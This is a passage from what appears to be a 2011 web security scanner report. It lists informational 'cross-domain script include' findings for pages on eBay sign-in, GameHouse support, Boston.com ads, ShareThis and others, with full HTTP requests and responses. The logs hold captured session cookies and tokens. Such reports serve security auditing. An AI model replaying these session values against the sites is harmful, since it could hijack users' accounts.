X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.25. http://realnetworks.com/pressroom/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /pressroom/index.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pressroom/index.aspx HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx; __qca=P0-1586148760-1311106896347; __utma=93573022.528241780.1311106897.1311106897.1311106897.1; __utmb=93573022.1.10.1311106897; __utmc=93573022; __utmz=93573022.1311106897.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:11:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.26. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5? HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:41:51 GMT
Server: Apache
Set-Cookie: RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 21371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: application/x-javascript
Connection: Keep-Alive

function OAS_RICH(position) {
if (position == 'TOP') {
document.write ('<A HREF="http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonial
...[SNIP]...
<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.boston/be_home;sz=728x90;ord=84105094?" type="text/javascript"></script>
...[SNIP]...
stream_lx.ads/www.boston.com/homepage/default/1524696595/MISC3/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'MISC4') {
document.write ('<script type="text/javascript" src="http://tags.crwdcntrl.net/c/520/cc.js"></script>
...[SNIP]...

21.27. http://sharethis.com/account/signin-widget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /account/signin-widget

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /account/signin-widget HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.75b569a75a17eaa05c9e6a5ce5631fad.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __unam=8f891fa-13142cc749b-8ad1c19-2; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.1.10.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 14139
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >
<
...[SNIP]...
</div>
   

<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

21.28. https://signin.ebay.com/ws/eBayISAPI.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.ebay.com
Path:   /ws/eBayISAPI.dll

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...
<body id="body"><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/2m/losgv3zyn2yr5lrg0h4ik5yt4.js#SYS-ZAM_vjo_e731_1_13527320_en_US"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/eu/341wgvdjgy2abb1qzf3cxflzf.js#SignInApp_SgnIn_e731_3_13527320_en_US"></script>
...[SNIP]...
<div class="GlobalNavigation" id="GlobalNavigation"><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/yo/gjzdlqbe2q0kzkzs2c4o43o5q.js"></script>
...[SNIP]...
<b,RcmdId SignIn2,RlogId p4plaijkehq%60%3C%3Dpi%2Bpu%28be1%3C6%3Eg-13143b2065d-0x106--><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/e2/1kgeg22jaq0d3efjwymeoqcvm.js#SignInApp_SgnIn_e731_6_13527320_en_US"></script>
...[SNIP]...

21.29. http://support.gamehouse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.gamehouse.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:39 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=B30EcAZyAiZUPA9%2FBBEEYABHAjhTQF1mAHwJOgYmBX8AcgRoByEHPlBzBA5SegJ3UWYHJlNzVDxQOw0xV14GfQVPCmEHS1ZwAAoBSwo3AUUHXAQHBk8Ca1RUDzAEbgQzAGUCJ1M7XTQAJAks; path=/
RNT-Time: D=121840 t=1311107139940601
RNT-Machine: 02
Vary: Accept-Encoding
Content-Length: 65280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...
<!--- end of footer --->
   
<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Lotame tag -->
   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.30. http://support.gamehouse.com/app/answers/detail/a_id/861/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.gamehouse.com
Path:   /app/answers/detail/a_id/861/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /app/answers/detail/a_id/861/ HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; __qca=P0-962211929-1311107164228; cpath=site; cp_session=BH5YLFImAydWPgZ2VEFUMAFGUGoEF1RvUS1fbAUlViwGdAl1UXdRaAB6UiZQNFRwVT1UJAJgVWwBPQd5UjFVMwY0XyVQflImVmUIYAFxUTwEZFhjUjADJ1Y%2BBnZUQFQ0AWhQZwR0VDJRZ19uBXRWcwYjCWVRJlFwAHxSKFB1VDdVJVQ8AnNVCAEqByZSYlVyBnNfblA9UmpWWgguAUlRYQRLWH5SDwNGVj0GE1RdVAABS1BtBANUbVFuXzEFZlZ3BmsJPVF3US8%3D; __utma=30093501.1002048789.1311107164.1311107164.1311107164.1; __utmb=30093501.3.10.1311107164; __utmc=30093501; __utmz=30093501.1311107164.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107252636%7C1468787252636%3B%20s_invisit%3Dtrue%7C1311109052639%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3Drealgamehousedev%253D%252526pid%25253DSupport%2525253A%25252520Home%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.gamehouse.com/app/answers/detail/a_id/861/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:34 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UykAdAB0ByNaMlMjABUAZAVCBz1QQwA7BHgNPgMjB30MflM7ByECOwc0VixXclEiVSUDawMrU3ADZAZ2AW5VIwcwWjoDOQJ4UTcCOVJiAiNTfgB0AGQHYFp8U28AMgBsBWQHd1A%2FAHYERQ00A2wHNAx5U2gHMwJoB3VWc1clUTJVdANzA3xTcANmBgsBPVVlByNaOANaAnZROQI9UmcCI1N%2BAHQAPwc3WjlTIwAOAHwFLQd3UGAAdgQ4DXcDXQd%2BDC9TPwdwAnIHb1ZvVz5RC1UoAx0DY1McA3cGDgEXVTgHRlpYA1QCGlFuAllSOwI4U2QANwBwBzxaNVMjAC4%3D; path=/
RNT-Time: D=151655 t=1311107254201788
RNT-Machine: 04
Vary: Accept-Encoding
Content-Length: 71984
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...
<!--- end of footer --->
   
<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Lotame tag -->
   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.31. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.gamehouse.com
Path:   /app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; cp_session=A3lTJwZyACQHbwR0AhdSNlQTUmhSQVVuUS0JOgUlVS8MfgFtBSMCOwYlU1kAKAh9U2QGJ1NzVT0FbgU5UFkBelYcAGsGSgchAwkASgM%2BDEgDWFNQBk8AaQcHBDsCaFJlVDFSd1I6VTxRdQks; __qca=P0-962211929-1311107164228; cpath=site; __utma=30093501.1002048789.1311107164.1311107164.1311107164.1; __utmb=30093501.2.10.1311107164; __utmc=30093501; __utmz=30093501.1311107164.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107207014%7C1468787207014%3B%20s_invisit%3Dtrue%7C1311109007016%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3Drealgamehousedev%253D%252526pid%25253DSupport%2525253A%25252520Home%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.gamehouse.com/app/answers/list/c/188%2525252C624/catname/Game%2525252520issues/session/L3NpZC9GZUNoRm%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:38 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9YLAx4ACRSOgR0ARQIbFUSVmxTQFFqUCwLOFd3USsNfwZuUXcGP1dnVC4MKQd0VCRQOFV9CCsBZlcnBGsGCQQgDmcEPgBuVysAP1FnBjFVdlgiDCkAN1I4BG4Bfgg%2FVWNWMFMkUVhQegtxVzZRZg0pBmFRNAZoVzNUIAwxB1pUJFBFVWcIZAFgVyAEYwZiBGsOJQR1ACNXYgB6UXcGKVV2WEkMagBrUmUEcwFgCDlVOFZ3U3VRcFAzCyBXd1FaDXEGLVE0BlpXP1RmDCkHO1QkUDpVMAg4ASdXeAR9BnAEZw50BDwAdFdbACZRJgZgVSdYfQxiAGlSbgQKAX0IRVViVkpTdlFfUBULalcSUV0NCAZBUToGV1c7VDsMPQdgVHFQP1U7CCsBeA%3D%3D; path=/
RNT-Time: D=319510 t=1311107258546611
RNT-Machine: 06
Vary: Accept-Encoding
Content-Length: 67417
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...
<!--- end of footer --->
   
<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Lotame tag -->
   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.32. http://support.gamehouse.com/app/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.gamehouse.com
Path:   /app/contact

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /app/contact HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AXtXIwN3ACQEbAd3UkcBZQdAAzkGFV1mVysOPVZ2UigCcFY6BiBRaA4tUlhWflMmW2wAIVV1CWFSOQM%2FVVwAewFLAGtQHAQiVlxTGVFsAkYBWldUA0oAaQQEBzhSOAE2B2IDJgZuXTRXcw4r; NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:53 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=BH5TJw15BCAEbAR0AhcJbVcQATsHFFVuA38PPAQkUykMfgRoV3EFPAQnV10CKlYjBjFTcgAgCGAGbVVpVl9SKVEbCWJRHQYgDQcIQldqUhYEX1NQDUQEbQQEBDsCaAk%2BVzIBJAdvVTwDJw8q; path=/
RNT-Time: D=115988 t=1311107153516068
RNT-Machine: 02
Vary: Accept-Encoding
Content-Length: 62277
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...
<!--- end of footer --->
   
<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Lotame tag -->
   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.33. http://support.microsoft.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.microsoft.com
Path:   /contactus/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contactus/ HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
